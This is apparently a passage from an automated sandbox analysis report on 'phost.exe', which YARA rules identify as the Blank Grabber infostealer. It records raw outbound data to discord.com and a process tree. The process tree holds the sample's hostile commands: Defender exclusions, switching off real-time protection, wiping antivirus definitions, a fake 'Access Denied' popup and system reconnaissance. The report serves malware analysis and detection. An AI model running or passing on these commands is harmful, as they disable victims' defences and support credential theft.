                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 17 cb 5d 67 4e ef 28 a1 d1 8f 66 66 4d 79 40 5a 8b a3 a5 48 bf e1 e4 33 27 e8 dd 05 e8 64 20 6c 06 75 2e 45 c8 2c ef c2 6d 44 fb d3 73 ca f8 aa cf 34 09 d0 aa 78 31 ed 90 84 13 c9 9b d2 36 88 58 c5 07 0d 6b af b8 73 03 aa 70 92 22 9b d6 2a 8f e4 09 e4 e0 6f 43 19 4c 83 59 b5 20 31 40 2e 2f 4d ec c9 e7 eb fd f5 78 74 0c cd ca 98 ed e4 78 c1 ec de d5 79 1e a4 18 a7 74 56 39 ad d0 8e 61 18 ab a0 71 7a 67 cd 6d 8d 0a 84 cb 20 89 67 78 df b2 32 37 cd e4 90 59 70 8f c6 29 fe 66 a1 da 14 79 7c d9 1a 3f e8 58 ed a7 6c 8c d9 44 61 54 cd 2c f0 ac 20 c7 b6 e4 80 22 6c 02 91 56 de 74 f6 1b f4 78 f4 fd 86 71 d4 86 31 1a 38 b1 ec 16 dc b8 ca 25 6c 47 9e 82 5e 95 39 f1 a7 b9 1d 89 3f 36 a1 36 b5 87 e8 7c 1b 94 dc 87 a9 2e b6 28 31 a8 82 d1 7f db 83 63 b9 1f 16 d4 c8 2c
                                                                                                                                                                                                                            Data Ascii: ]gN(ffMy@ZH3'd lu.E,mDs4x16Xksp"*oCLY 1@./MxtxytV9aqzgm gx27Yp)fy|?XlDaT, "lVtxq18%lG^9?66|.(1c,
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 85 a8 bd b6 e1 09 ca 25 61 e8 14 7a 3a 70 c0 2a 88 ee 48 0d b5 52 ca ed 2c 73 e1 16 58 16 eb d8 b3 1e 88 a4 fb 41 5d f9 af 08 12 40 14 83 94 d3 aa 0a 95 7e c2 79 fa 56 a1 e1 9f ed f0 3e 50 0d 24 98 ff 2d 53 b6 d2 4f 23 fb d8 0d fe 4e 23 c8 60 8d 8b 7c d6 79 b1 8a 61 84 04 bf 44 09 5f a7 33 e6 a0 d5 86 a1 63 15 ff 53 d0 37 47 22 5c 88 59 3d f9 63 74 6b 09 4c 6a e4 37 3a cf 6a f8 f8 46 95 f6 4b 3b 62 ab ed 62 11 5d 62 a5 07 6e 7d a7 ad 91 63 93 a4 b9 c9 ae 5d 54 95 d9 5f 99 ea 1f 15 aa 65 60 07 6b 43 2b 6d 4c c1 c5 d1 49 4e 86 0e 91 9e 69 df df 58 c0 0e b9 31 c9 4e a7 88 fc 70 68 f1 3f 85 83 63 c9 20 ce b7 e9 44 37 05 54 6a cb 92 f8 3c 95 94 63 af 15 64 5c 55 60 73 35 00 32 63 bc 5e c8 08 17 82 28 c0 d3 d4 ec 48 1b ff 9f 0a 36 37 8b e2 3d 28 4a 32 fc bc 77
                                                                                                                                                                                                                            Data Ascii: %az:p*HR,sXA]@~yV>P$-SO#N#`|yaD_3cS7G"\Y=ctkLj7:jFK;bb]bn}c]T_e`kC+mLINiX1Nph?c D7Tj<cd\U`s52c^(H67=(J2w
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: ed 0e 50 1f 01 59 1f ed 0a 9c 73 c6 96 5d a0 02 38 4c ad 84 ec 3b cc 61 e3 16 02 1f 0f 5d 4c 76 cf 68 22 5c fb f1 e6 40 3c ea c2 1f b3 05 4f 4d 55 22 00 65 9d f8 e0 3a ca 69 f3 a1 ac 65 7b 35 02 73 88 cc fe 22 2b 13 f1 77 d3 5f fe 45 81 13 c9 ed b1 6c c2 5a c4 03 5a 4e 3c d0 4a 2b 6c 72 0c 21 c1 70 11 00 9f 52 32 0e 89 48 57 7e a5 95 93 6e 11 b9 50 4d 19 e4 f6 87 76 50 8c ef e1 ce 5f 6b 16 2a 40 ec e8 e0 2d b8 52 64 e4 88 6d 9f 55 a9 c1 51 5f a8 d9 c2 5a 63 f9 38 bf a4 f0 82 2d f9 e2 72 83 d9 6c 3b 0c 08 9a ea f5 a1 0d 53 83 af e3 0c 85 35 34 2d 5a ce bf fd 44 9b dc fe cd 61 04 1a 42 4d 02 c6 ac 43 27 1e 66 41 b3 4e 1f 4c 3f e7 7c 64 15 ad 48 12 93 87 7d 94 48 00 e5 00 59 d3 d0 d6 29 ff 7a 88 78 e7 03 d3 77 cc 99 bf 63 93 66 60 ec 1f 20 a6 de ca b0 f8 5d
                                                                                                                                                                                                                            Data Ascii: PYs]8L;a]Lvh"\@<OMU"e:ie{5s"+w_ElZZN<J+lr!pR2HW~nPMvP_k*@-RdmUQ_Zc8-rl;S54-ZDaBMC'fANL?|dH}HY)zxwcf` ]
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 8d f6 b4 f2 ca 1f 34 cf f9 d2 d7 dd 51 fb 46 68 34 10 c4 3e 04 79 56 ae 1b bb 29 9c ff 91 99 d3 5e 27 bc 6d 2c 22 ad 7f 5e 82 1b 18 66 81 d0 0b 82 ca ca 17 33 6b ff f2 f0 8b 62 d8 7c 1b 55 f3 cc 23 d6 81 64 e9 fe 7f 92 d5 6b 26 59 94 bf 7e 75 51 91 ea 77 17 c7 30 e6 d7 fc 45 ab 88 9c c6 65 e2 ec 7b 90 63 e6 04 11 0f ca 19 6b 20 0b 04 1c b8 bc 8b 5b d8 cd 81 87 a8 f6 33 81 60 68 b8 78 b0 bc e1 93 22 d6 82 c2 2c 32 ef 3d bf 10 11 d9 10 ea 9e 8d 33 f6 6f 2d bd ab 11 c9 0b 5d d5 c1 27 18 bb 44 ae 7d ce d6 31 71 44 df 81 82 54 b0 b0 44 4d 56 34 9d 56 7f 74 a7 2c f2 ab d4 d3 8b 4d f2 a0 3d 41 f0 b8 d8 4e b8 38 5a 1c cc ff bc 1d 80 10 aa c9 fc 3f 80 f4 da 7f cf a9 7d 94 2b b5 a8 8e 16 d6 2f f1 d8 c2 8a bf cf 11 00 5a 75 a7 68 79 a6 23 d8 db 8d 26 de 85 76 24 64
                                                                                                                                                                                                                            Data Ascii: 4QFh4>yV)^'m,"^f3kb|U#dk&Y~uQw0Ee{ck [3`hx",2=3o-]'D}1qDTDMV4Vt,M=AN8Z?}+/Zuhy#&v$d
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 72 6b 0f 4c 10 aa 3d 5a 6c a0 f8 6c 5b fa eb 8e 06 13 49 2a 5d 2f ae 4d 5f 68 58 5c 14 07 b0 42 40 be f8 b3 75 0f 67 6b d9 7c 3f 20 c4 3e 5c c5 be 38 d2 e5 99 d8 17 7a a5 c4 90 f6 47 96 16 20 47 05 17 e2 58 ea 28 82 2e c6 cd fd 8b 40 62 c9 d2 bb 77 f9 56 68 7e 7e c2 b2 3a d6 ce 09 d4 1e 41 81 64 fb af 89 99 fa ed e7 b4 39 d3 70 15 b2 ca 17 a5 cd ea 9d a2 8c ed 83 39 3b 06 0f e9 8e 16 72 47 9a 95 79 56 bf a5 2b ce 6a 46 8d ca 33 1f ea 63 ce 30 1c 0a 90 37 a6 eb f6 53 8e 1e ab 1c d5 61 a1 57 15 e7 c0 39 93 c4 24 e7 50 94 64 94 f3 f6 86 29 64 23 65 ed 85 ef ec 7e 0e 9c e3 d7 5d 9f 98 3b b7 1b 41 88 c9 62 40 41 97 36 e5 03 54 14 62 90 a5 5b c6 ee 4e c4 3a a0 1c 68 71 27 05 58 9c 11 96 d8 bc 5b 01 47 ee 39 3c 48 35 84 bf 0a 40 18 0d 69 92 7b f1 4c 3d bf 09 30
                                                                                                                                                                                                                            Data Ascii: rkL=Zll[I*]/M_hX\B@ugk|? >\8zG GX(.@bwVh~~:Ad9p9;rGyV+jF3c07SaW9$Pd)d#e~];Ab@A6Tb[N:hq'X[G9<H5@i{L=0
                                                                                                                                                                                                                            2024-12-13 07:42:29 UTC16384OUTData Raw: 8d 4c cf 9a 89 52 32 14 33 0b 8b 9a 88 49 ec e9 06 63 ee a8 a2 98 80 22 07 51 8d 2f 59 62 89 38 3a eb a5 bc fd e7 fc f8 cb f5 7c 2a 07 5c ad de 16 3b 8f 00 96 28 25 b9 d3 47 a4 ca c9 79 0e 01 d0 80 b2 a8 ff 8e 26 c8 e2 5f 98 ee 6a f6 f7 fa 02 da 8d d3 da 2f ed 37 8b 80 66 d2 31 84 1f 14 d4 0b 29 fe 70 f3 c3 68 02 99 99 73 de 5f c9 f9 f6 18 0a a8 f4 08 b2 63 5a 03 de 01 ef db 67 c4 99 60 26 4e 9c 08 67 91 11 45 b3 3c 10 5c d8 5f d7 af 5f 83 48 b7 28 cb 72 02 36 ea 29 b9 4c 42 6f e9 9a da 3d 8b fb dc 72 5c 16 35 18 bb ba 8c f6 6a 71 06 dd 9e a4 91 f8 50 9b 91 4d 45 00 a2 d7 13 13 30 ce 17 8b 0a 13 7d 75 0b 89 61 ab f4 7d aa f4 61 55 33 d6 67 7e 01 e0 53 e9 26 d0 7f 9c d8 45 29 a1 9e 3c e9 14 7c 10 be ec d2 99 bf f8 c5 10 9c d5 2e 38 2b 81 bd e0 07 cf 2c da
                                                                                                                                                                                                                            Data Ascii: LR23Ic"Q/Yb8:|*\;(%Gy&_j/7f1)phs_cZg`&NgE<\__H(r6)LBo=r\5jqPME0}ua}aU3g~S&E)<|.8+,
                                                                                                                                                                                                                            2024-12-13 07:42:31 UTC1257INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                            Date: Fri, 13 Dec 2024 07:42:31 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Content-Length: 45
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                            x-ratelimit-limit: 5
                                                                                                                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                                                                                                                            x-ratelimit-reset: 1734075752
                                                                                                                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bba3f1%2FZudwJQkFnKMdEqfZPnm6iBU18h3o3V9HzDakAlD5TEPANc%2BJkkp4mRZbicFS%2BglfWhSxd5p311G2JhLOYuxaDo7M3Dq5SOiR%2BQaH2o1Dt9emz1wTDcHLh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Set-Cookie: __cfruid=d7c98e932c69185b4fd952897188f4a54139cb30-1734075751; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                            Set-Cookie: _cfuvid=E0fT_eR75aZoCbniOOZ.Jl5rOKtvPVKzo2aCeNNnf0A-1734075751127-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8f14515d1ed40cb2-EWR


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:02:41:41
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\phost.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff62cc70000
                                                                                                                                                                                                                            File size:7'832'204 bytes
                                                                                                                                                                                                                            MD5 hash:8C43BF4445CAC5FA025B9DFD07517B6F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680237831.000001C32AC85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1680237831.000001C32AC83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:02:41:41
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\phost.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff62cc70000
                                                                                                                                                                                                                            File size:7'832'204 bytes
                                                                                                                                                                                                                            MD5 hash:8C43BF4445CAC5FA025B9DFD07517B6F
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1702090319.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2178616618.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2170059092.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2166479596.000001AE1E122000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2173409124.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2175138187.000001AE1D7E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2172415408.000001AE1D7E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
                                                                                                                                                                                                                            Imagebase:0x7ff6e9de0000
                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:02:41:44
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
